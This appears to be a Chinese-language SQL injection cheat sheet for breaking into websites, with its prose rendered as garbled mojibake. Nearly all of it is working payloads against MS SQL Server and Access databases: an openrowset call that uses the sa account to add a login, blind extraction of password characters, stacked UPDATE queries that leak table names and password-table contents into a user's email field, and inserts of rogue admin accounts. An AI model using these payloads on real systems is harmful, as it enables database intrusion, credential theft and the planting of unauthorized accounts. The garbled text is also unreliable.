ÈëÇÖÍøÕ¾±Ø±¸SqlÓï¾ä:(¾­µäÓï¾ä)

ºËÐÄÌáʾ£º select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addloginhax)²éѯ¹¹Ô죺SELECT * FROM news WHERE id=... AND topic=... AND ...

select * from openrowset

(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin

hax)

²éѯ¹¹Ô죺

SELECT * FROM news WHERE id=... AND topic=... AND .....
adminand 1=(select count(*) from [user] where username=victim and
right(left(userpass,01),1)=1) and userpass£ 
select 123;--
;use
master;--
:a or name like fff%;-- ÏÔʾÓÐÒ»¸ö½ÐffffµÄÓû§¹þ¡£
and 1(select
count (email) from [user]);--
;update [users] set email=(select top 1 name
from sysobjects where xtype=u and status>0) where name=ffff;--
;update
[users] set email=(select top 1 id from sysobjects where xtype=u and name=ad)
where name=ffff;--
;update [users] set email=(select top 1 name from
sysobjects where xtype=u and id>581577110) where name=ffff;--
;update
[users] set email=(select top 1 count(id) from password) where name=ffff;--
;update [users] set email=(select top 1 pwd from password where id=2) where
name=ffff;--
;update [users] set email=(select top 1 name from password
where id=2) where name=ffff;--

ÉÏÃæµÄÓï¾äÊǵõ½Êý¾Ý¿âÖеĵÚÒ»¸öÓû§±í,²¢°Ñ±íÃû·ÅÔÚffffÓû§µÄÓÊÏä×Ö¶ÎÖС£

ͨ¹ý²é¿´ffffµÄÓû§×ÊÁϿɵõÚÒ»¸öÓñí½Ðad

È»ºó¸ù¾Ý±íÃûadµÃµ½Õâ¸ö±íµÄID µÃµ½µÚ¶þ¸ö±íµÄÃû×Ö

insert into
users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),
char(0x63)+char (0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert
into users values( 667,123,123,0xffff)--
insert into users values ( 123,
admin--, password, 0xffff)--
;and user>0
;and (select count(*) from
sysobjects)>0
;and (select count(*) from mysysobjects)>0
//ΪaccessÊý¾Ý¿â